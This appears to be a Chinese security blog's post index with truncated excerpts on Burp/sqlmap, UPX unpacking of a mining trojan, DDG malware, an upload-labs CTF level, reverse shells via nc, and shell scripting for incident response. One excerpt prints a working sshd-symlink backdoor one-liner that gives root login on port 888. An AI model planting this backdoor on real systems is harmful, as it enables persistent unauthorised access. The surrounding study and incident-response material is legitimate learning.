- 博客(11)
- 收藏
- 关注
RSS订阅转载 记一次Burpsuite安装SQLmap的sqlipy的小坑
前言打算使用Burpsuite中的ssqlmap插件,结果死活安装不上,遂有了此篇文章,插件安装参考:https://www.jianshu.com/p/4c3d64a0d5da占坑下载Jython后再Burp中加载进去后如下坑位就在这里,使用了中文路径 就会导致下载插件后一直加载不上,查看报错如下脱坑讲中文路径改掉即可成功,然后发现参考文章里其实提到过不...
2019-07-21 18:48:00
543
转载 变形UPX砸壳记
背景 一次应急遇到了某挖矿木马,提取出矿机进行分析时发现加壳了,为UPX变形壳,遂有了此砸壳过程,比较简单主要做个记录砸壳 直接进行UPX脱壳是没法脱掉的,打开编辑器看下是对魔数进行了修改,如下为修改后的:进行修复,将2E 62 73 73修改为55 50 58 21接着使用upx -d 直接砸壳即可比较菜所以喜欢记录一些学习过程...
2019-07-13 16:56:00
319
转载 DDG全家桶之3022
本篇文章主要根据360Netlab新出的DDG分析文档来复现新变种3022,会涉及部分分析和清除的方法,本篇文章只用于学习交流,为广大受害者提供清除思路 ,请勿用于非法用途,产生一切后果与作者无关 详情请参考文档:https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/一、下载下载脚本:http://119.9.1...
2019-04-14 18:22:00
207
转载 upload-labs-master文件上传靶场第七关详解
一.前言 upload-labs-master是文件上传靶场,里面目前总共有19关,github地址https://github.com/c0ny1/upload-labs,今天要说的是这个靶场的第七关的解法二.正文先看下第七关长什么样和其他几关一样,咱们先直接看下源码吧$is_upload = false;$msg = null;if (isset...
2018-10-23 22:55:00
1029
转载 shell脚本实现进程对比
一.目的 有时候我们会遇到在linux服务器上ps的进程和/proc里进程号不一致的情况,这个时候我们需要以/proc为标准来看ps里没有的进程,于是编写了下面的脚本二.代码直接贴出代码#!/bin/bash#Date:2018-10-6#Author:Id3al#Func:通过脚本将proc下的进程号与ps出来的进程号进行对比,可用于应急响应里隐藏进程...
2018-10-06 18:25:00
151
转载 利用shell脚本批量判断目标ip存活情况
一.目的 有时候需要批量去判断目标ip是否存活,一个一个去试多麻烦所以写了个shell脚本去批量尝试,原理使用的是去ping目标ip,虽然这种方法受很多因素影响,比如网速,防火墙禁ping等,但是也是一种思路二.代码直接贴上代码#!/bin/bash#Date:2018#Author:Id3al#Fuc:通过ping命令去批量判断ip是否存活Pi...
2018-10-06 15:52:00
972
转载 linux中Sed命令的使用(基础)
前言: sed是linux中的命令,一直以来从未使用过这个命令,但是其能力确实非常大的,特别是搭配正则匹配使用的时候,下面是我学习sed命令的过程,会用我自己学习时的实例来演示,功力尚浅,所以凑活着看一、sed介绍 SED是一项Linux指令,全名是stream editor,功能同awk类似,差别在于,sed简单,对列处理的功能要差一些,awk的功能复杂,对列处理的功能...
2018-08-30 21:27:00
180
转载 [转载]深入理解 sudo与su 之间的区别
前言: 最近有用到这两个命令,有时候不是很理解其区别,在网上看到了下面这篇文章,解释的很是清晰,因此转载过来做个记录,希望能共同学习正文在早前的一篇文章中,我们深入讨论了 sudo 命令的相关内容。同时,在该文章的末尾有提到相关的命令 su 的部分内容。本文,我们将详细讨论关于 su 命令与 sudo 命令之间的区别。在开始之前有必要说明一下,文中所涉及到的示例教程都已...
2018-08-28 22:29:00
409
转载 nc+管道符的一种反弹shell姿势
一.什么叫反弹shell? 在计算机科学中,Shell俗称壳(用来区别于核),是指“提供使用者使用界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序,这是来自百度百科的解释,通俗点就是说shell是一个用来执行命令的软件,比如我们常见的windows系统下的cmd.exe、powershell,linu...
2018-07-28 16:25:00
945
转载 python3.X版本与2.X版本里urllib库的不同
最近在学习使用python3写爬虫,刚开始写很菜(上次听到一个大佬说花了一天时间学习Python,第二天就开始做了个大的爬虫,大佬就是大佬岂是我等小菜能比的),因为之前学了一点2版本所以现在学习使用3版本写爬虫时会有些不同,下面主要说下urllib库的不同。1.urllib库是什么?urllib库提供了一系列用于操作URL的功能。是python中一个功能特比强大的库,在pyth...
2018-07-14 23:58:00
182
转载 linux经典一句话后门(我认为的)
今天在看某牛的博客时看到的linux一句话后门,所以在这边记录一下,详细的解释看文末参考1.1 后门代码目标主机上执行:ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=888;攻击机上执行: ssh root@x.x.x.x -p 8881.2 解释代码解释一下上面的代码,ln在linux中代表“连接数据”,学...
2018-07-10 22:48:00
648
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人